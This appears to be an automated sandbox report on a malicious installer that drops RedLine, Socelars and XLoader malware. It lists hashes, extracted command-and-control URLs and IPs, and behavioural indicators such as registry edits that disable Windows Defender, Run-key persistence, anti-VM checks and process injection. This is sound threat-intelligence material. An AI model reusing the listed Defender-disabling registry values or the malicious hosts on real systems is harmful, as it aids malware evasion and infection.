Resubmissions
30-10-2021 19:59  211030-yqs94acafr  10
30-10-2021 19:47  211030-yhtkwscafm  10
30-10-2021 18:51  211030-xhyzyacabn  10
30-10-2021 08:53  211030-ktb84abdfp  10
Analysis
max time kernel: 1492s
max time network: 2695s
platform: windows11_x64
resource: win11
submitted: 30-10-2021 08:53
Static task: static1
Behavioral task: behavioral1, sample setup_x86_x64_install.exe, resource win7-en-20210920
Behavioral task: behavioral2, sample setup_x86_x64_install.exe, resource win11
Behavioral task: behavioral3, sample setup_x86_x64_install.exe, resource win10-en-20211014
General
Target: setup_x86_x64_install.exe
Size: 4.2MB
MD5: 2c1278bdd864323e17dd46c7774e0d08
SHA1: 4e03a5d24d1d6ed106320778e9135b88f27ecfbe
SHA256: a5e44dd81280a7fbef17c18e528c9df4b1289144fbc107d011af282a69cc3062
SHA512: 82a1d89e0692e8037563c92c834a3e3181b52c4423d8d6d860d31d56ef2a3c12083f8ddcc0e058ba7119a7c636938be963c70a14bdc276495e1b1b630ceddd25
Malware Config
Extracted: https://fortnightgalaxyswapper.ru/sold.exe
Extracted: https://fortnightgalaxyswapper.ru/Amongus.exe
Extracted: redline, srtupdate33, 135.181.129.119:4805
Extracted: xloader, 2.5, s0iw, http://www.kyiejenner.com/s0iw/ and a list of 64 further domains
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  pid 7024 rundll32.exe, target pid 4792: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid 2576 rundll32.exe, target pid 4792: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 2 IoCs
Processes:
  behavioral2/memory/1432-304-0x0000000000400000-0x0000000000420000-memory.dmp  yara_rule family_redline
  behavioral2/memory/1432-303-0x0000000000000000-mapping.dmp  yara_rule family_redline
Socelars Payload 2 IoCs
Processes:
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exe  yara_rule family_socelars
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exe  yara_rule family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
  PID 5852 svchost.exe created 6480 AdvancedRun.exe
  PID 5852 svchost.exe created 6480 AdvancedRun.exe
  PID 5852 svchost.exe created 888 AdvancedRun.exe
  PID 5852 svchost.exe created 888 AdvancedRun.exe
Turns off Windows Defender SpyNet reporting 2 TTPs
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Xloader Payload 1 IoCs
Processes:
  behavioral2/memory/6956-591-0x0000000002790000-0x00000000027B9000-memory.dmp  yara_rule xloader
Processes:
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurlpp.dll  yara_rule aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurlpp.dll  yara_rule aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libstdc++-6.dll  yara_rule aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libstdc++-6.dll  yara_rule aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll  yara_rule aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll  yara_rule aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll  yara_rule aspack_v212_v242
Blocklisted process makes network request 8 IoCs
Processes:
  flow 56   pid 3088 mshta.exe
  flow 60   pid 3088 mshta.exe
  flow 231  pid 5208 cmd.exe
  flow 465  pid 6148 powershell.exe
  flow 474  pid 7284 powershell.exe
  flow 572  pid 6956 cmstp.exe
  flow 681  pid 6956 cmstp.exe
  flow 789  pid 6956 cmstp.exe
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Vgb9MSUHJnGgHNOrMsbi_BKX.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  soldd.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  LF6wUUS4Bh5t4GsH_50X1G6X.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  52B3.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  LF6wUUS4Bh5t4GsH_50X1G6X.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  3dMI4Si0Juc8JmYItUK1_bOX.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  soldd.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  t2RSCnrA9J7oKhlzpAzxT6n3.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  LF6wUUS4Bh5t4GsH_50X1G6X.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  52B3.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  3dMI4Si0Juc8JmYItUK1_bOX.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  Vgb9MSUHJnGgHNOrMsbi_BKX.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  t2RSCnrA9J7oKhlzpAzxT6n3.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  LF6wUUS4Bh5t4GsH_50X1G6X.exe
Loads dropped DLL 64 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths  xialBpZY0CCGO2X6atbO74Tn.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet  xialBpZY0CCGO2X6atbO74Tn.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"  xialBpZY0CCGO2X6atbO74Tn.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"  xialBpZY0CCGO2X6atbO74Tn.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\569C.exe = "0"  569C.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions  xialBpZY0CCGO2X6atbO74Tn.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe = "0"  xialBpZY0CCGO2X6atbO74Tn.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection  xialBpZY0CCGO2X6atbO74Tn.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  xialBpZY0CCGO2X6atbO74Tn.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features  xialBpZY0CCGO2X6atbO74Tn.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  xialBpZY0CCGO2X6atbO74Tn.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
  Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run  cmstp.exe
  Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run  setup.exe
  Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run  Calculator.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg"  setup.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg"  setup.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg"  Calculator.exe
  Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run  msedge.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WDEHFTBP1 = "C:\\Program Files (x86)\\A7nrtit\\helpydn.exe"  cmstp.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"  1775299.exe
  Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run  setup.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  569C.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  soldd.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Vgb9MSUHJnGgHNOrMsbi_BKX.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  t2RSCnrA9J7oKhlzpAzxT6n3.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  LF6wUUS4Bh5t4GsH_50X1G6X.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  jg1_1faf.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  3dMI4Si0Juc8JmYItUK1_bOX.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  LF6wUUS4Bh5t4GsH_50X1G6X.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  52B3.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  569C.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 48   ipinfo.io
  flow 162  ipinfo.io
  flow 163  ipinfo.io
  flow 218  ipinfo.io
  flow 227  ipinfo.io
  flow 2    ip-api.com
  flow 8    ipinfo.io
  flow 47   ipinfo.io
  flow 192  ipinfo.io
Drops file in System32 directory 3 IoCs
Processes:
  File created C:\Windows\system32\services32.exe  conhost.exe
  File opened for modification C:\Windows\system32\services32.exe  conhost.exe
  File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe  conhost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
  pid 5744 LF6wUUS4Bh5t4GsH_50X1G6X.exe
  pid 2236 LF6wUUS4Bh5t4GsH_50X1G6X.exe
  pid 5704 t2RSCnrA9J7oKhlzpAzxT6n3.exe
  pid 6212 52B3.exe
Suspicious use of SetThreadContext 15 IoCs
Processes:
  PID 3232 Sat01d42d6cf82db.exe set thread context of 1432 Sat01d42d6cf82db.exe
  PID 3372 okMapBnuwoKkFkv6DNJnxaAd.exe set thread context of 3196 Explorer.EXE
  PID 5588 Vgb9MSUHJnGgHNOrMsbi_BKX.exe set thread context of 6996 AppLaunch.exe
  PID 5236 3dMI4Si0Juc8JmYItUK1_bOX.exe set thread context of 7148 65A2.exe
  PID 5240 soldd.exe set thread context of 5936 AppLaunch.exe
  PID 4384 WerFault.exe set thread context of 5812 RegAsm.exe
  PID 5684 Vnbdvi08mAvQMZ57cLQirs_r.exe set thread context of 6992 RegAsm.exe
  PID 4820 LRSqKfZCaNZ_zXzXGAw7tCbk.exe set thread context of 7024 LRSqKfZCaNZ_zXzXGAw7tCbk.exe
  PID 3068 xialBpZY0CCGO2X6atbO74Tn.exe set thread context of 1472 xialBpZY0CCGO2X6atbO74Tn.exe
  PID 6956 cmstp.exe set thread context of 3196 Explorer.EXE
  PID 8016 conhost.exe set thread context of 668 explorer.exe
  PID 6952 D6C9.exe set thread context of 5388 D6C9.exe
  PID 6956 cmstp.exe set thread context of 668 explorer.exe
  PID 6836 6B9E.exe set thread context of 5352 6B9E.exe
  PID 2852 569C.exe set thread context of 7124 aspnet_state.exe
Drops file in Program Files directory 15 IoCs
Processes:
  File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat  mshta.exe
  File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe  o9uSZntIwqe93u3YXgjwODAp.exe
  File opened for modification C:\Program Files (x86)\A7nrtit\helpydn.exe  cmstp.exe
  File opened for modification C:\Program Files (x86)\A7nrtit\helpydn.exe  explorer.exe
  File created C:\Program Files (x86)\FarLabUninstaller\is-A3T6M.tmp  mshta.exe
  File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe  x_NIOasvKYPQ56cpcMhnsHLe.exe
  File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini  x_NIOasvKYPQ56cpcMhnsHLe.exe
  File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe  o9uSZntIwqe93u3YXgjwODAp.exe
  File created C:\Program Files (x86)\A7nrtit\helpydn.exe  explorer.exe
  File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat  mshta.exe
  File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe  x_NIOasvKYPQ56cpcMhnsHLe.exe
  File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe  x_NIOasvKYPQ56cpcMhnsHLe.exe
  File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe  o9uSZntIwqe93u3YXgjwODAp.exe
  File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe  o9uSZntIwqe93u3YXgjwODAp.exe
  File opened for modification C:\Program Files (x86)\A7nrtit  explorer.exe
Drops file in Windows directory 7 IoCs
Processes:
  File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb  svchost.exe
  File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm  svchost.exe
  File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log  svchost.exe
  File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp  WerFault.exe
  File opened for modification C:\Windows\WindowsUpdate.log  svchost.exe
  File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk  svchost.exe
  File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log  svchost.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  D6C9.exe
  Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  D6C9.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  LRSqKfZCaNZ_zXzXGAw7tCbk.exe
  Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  LRSqKfZCaNZ_zXzXGAw7tCbk.exe
  Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  LRSqKfZCaNZ_zXzXGAw7tCbk.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  D6C9.exe
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
6416 | schtasks.exe
6964 | schtasks.exe
4696 | schtasks.exe
3740 | schtasks.exe
2612 | schtasks.exe
5444 | schtasks.exe
-
Enumerates system info in registry 2 TTPs 49 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Calculator.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | services32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | services32.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Calculator.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | Calculator.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | Calculator.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | Conhost.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | conhost.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
-
Kills process with taskkill 7 IoCs
Processes:
pid | process
8092 | taskkill.exe
4208 | taskkill.exe
6308 | taskkill.exe
4696 | taskkill.exe
4672 | taskkill.exe
5948 | taskkill.exe
2912 | taskkill.exe
-
Processes:
description | ioc | process
Key created | \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | cmstp.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | WaaSMedicAgent.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | WaaSMedicAgent.exe
